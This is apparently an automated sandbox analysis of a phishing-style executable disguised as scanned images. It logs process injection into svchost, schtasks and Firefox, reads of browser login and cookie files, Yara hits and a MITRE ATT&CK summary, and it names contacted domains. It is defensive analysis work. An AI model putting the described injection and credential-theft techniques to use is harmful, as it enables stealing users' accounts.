            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A781F7 GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4A395 SetUnhandledExceptionFilter, UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4A364 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Thread register set: target process: 3152
            Source: C:\Windows\SysWOW64\schtasks.exe | Thread APC queued: target process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 22AD008
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A78C93 LogonUserW
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A23B4C GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A24A35 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A84EF5 mouse_event
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A781F7 GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A84C03 AllocateAndInitializeSid, CheckTokenMembership, FreeSid
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: XraVxjqYYo.exe, 00000008.00000002.3809288774.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000000.1546515158.0000000001051000.00000002.00000001.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696182247.0000000001681000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4886B cpuid
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A550D7 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A62230 GetUserNameW
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A5418A __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A24AFE GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_81
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_XP
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_XPe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_VISTA
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_7
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: WIN_8
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A96596 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A96A5A socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix

One line per tactic, techniques in matrix row order; the number in parentheses is the count of matched signatures for that technique, techniques without a number had no match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (3); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Scheduled Task/Job (1); Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1494558, sample: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, start date: 18/08/2024, architecture: WINDOWS, score: 100

Top-level network: www.zhuan-tou.com; www.winkthree.com; 19 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures

Process chain (edges as drawn in the graph):

Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe (started)
